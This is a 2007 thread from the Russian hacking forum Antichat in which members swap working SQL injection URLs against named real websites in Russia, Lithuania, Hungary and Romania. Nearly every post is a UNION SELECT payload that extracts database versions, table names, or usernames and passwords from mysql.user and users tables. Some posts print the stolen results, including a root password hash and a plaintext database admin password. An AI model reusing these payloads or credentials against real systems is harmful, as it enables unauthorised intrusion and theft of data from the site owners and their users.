ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1111  
Старый 17.03.2007, 23:38
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

с таблицами беда =\
Код:
http://www.gridcc.org/viewparticipant.php?id=-1091+union+select+1,user(),3,4,5,6/*
А вот здесь все очень четко и грамотно, это я называю -идеальная скуль))
Код:
http://www.gs-energy.com/news.php?id=-53+union+select+1,user,password,4,version(),6,7,8,9,10,11,12+from+mysql.user/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1112  
Старый 18.03.2007, 00:03
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

http://www.lygus.lt/ITC/verslas.php?id=-20+union+select+1,concat(user(),0x3a,database(),0x 3a,version()),3,4,5/*

http://games.lala.lt/cats.php?id=-7+union+select+1,version(),3/*

не улыбнуло(((

http://www.terasz.hu/terasz.php?id=galeria&page=sorozat&sorozat_id=996+ union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+li mit+2,1/*
Просмотр таблиц лимитом!

http://www.terasz.hu/terasz.php?id=galeria&page=sorozat&sorozat_id=996+ union+select+1,concat(user,0x3a,password),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user+l imit+1,1/*

root:*8E6C3D25857494FD7339B819E6661B6F45FFB320

улыбнуло

Последний раз редактировалось XTErner; 18.03.2007 в 02:50..
 
Ответить с цитированием

  #1113  
Старый 18.03.2007, 03:46
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

http://www.artiks.ru/consultant_text.php?id=-4376+union+select+1,2,0x50726576656420616E74696368 61742779,4,5,6,7,null,9,10,11,12,13--
 
Ответить с цитированием

  #1114  
Старый 18.03.2007, 07:56
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Код:
http://money.rin.ru/content/?id=-1+union+select+1,concat(USER(),0x3a,VERSION()),3,4,5+from+mysql.user+limit+0,1/*
Код:
http://www.famajor.com/index.html?ID=eshop&select=-1+union+select+1,2,3,USER(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*&lb=P-MONEY
Код:
http://russiantopics.com/money/moneytxt.php?id=-1+union+select+1,concat(username,0x3a,password,0x3a,email),3,4,5,6+from+users/*

Последний раз редактировалось VampiRUS; 18.03.2007 в 08:43..
 
Ответить с цитированием

  #1115  
Старый 18.03.2007, 12:07
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

www.itartass.ur.ru
Цитата:
http://www.itartass.ur.ru/money/print.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9
5 версия, 103 столбца, ничё интересного не нашёл 0_о
 
Ответить с цитированием

  #1116  
Старый 18.03.2007, 14:32
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Может и было...

Код:
http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #1117  
Старый 18.03.2007, 15:15
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Цитата:
Сообщение от Grey  
Может и было...

Код:
http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*
http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(user,char(58),password),3, 4,5,6,7,8,9,10,11,12,13+from+mysql.user/*

Цитата:
www.itartass.ur.ru

Цитата:
http://www.itartass.ur.ru/money/print.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9


5 версия, 103 столбца, ничё интересного не нашёл 0_о
Ты наверное хотел сказать 103 таблицы)))

Последний раз редактировалось Colkru; 18.03.2007 в 15:17..
 
Ответить с цитированием

  #1118  
Старый 18.03.2007, 15:20
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

_cwhost.ru
Код:
http://cwhost.ru/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+0,1/*
хостинг какой-то... кривой.. при попытке зайти бросает на valuehost, мб подкомпания... дальше не смотрел, т.к. сайт не грузится что-то

webstudent.ru
Код:
http://webstudent.ru/modules/wfsection/article.php?articleid=1020+and+1020=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
там xoops 2.*
таблица вроде users называется, префикс по умолчанию - xoops. но в данном случае другой не стал копаться..

Последний раз редактировалось n1†R0x; 18.03.2007 в 15:22..
 
Ответить с цитированием

  #1119  
Старый 18.03.2007, 16:32
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.fiat.com.ro/carinfo_galerie.php?id=-17%20UNION%20SELECT%201,2,concat(user(),0x3a,database()),4,5,6,7,8,9/*
Код:
http://www.eliberadio.ro/show.php?id=21+union+select+1,version(),3,4,5,6,7,8,9,10,11+limit+1,1/*
Код:
http://www.romanicriss.org/noutati.php?id=-13%20UNION%20SELECT%201,2,3,4,5,password,7,8,9,10,11,12+from+users/*
Код:
http://www.istyle.ro/categorie.php?id=-97+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
pass:4ef35e0e3f1db2c1
user: sqladmin
 
Ответить с цитированием

  #1120  
Старый 18.03.2007, 17:29
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.wargames.ru

Код:
http://www.wargames.ru/sections.php?op=listarticles&secid=-1+union+select+1,convert(concat(name,char(58),pass),char),3,4+from+users/*
Вот только ни как юзер, ни как админ зайти почемуто нельзя.


www.splav.kharkov.com

Таблу не подобрал =(
Код:
http://www.splav.kharkov.com/choose_mat.php?class_id=-1+union+select+user()/*

Последний раз редактировалось Ksander; 18.03.2007 в 17:48..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ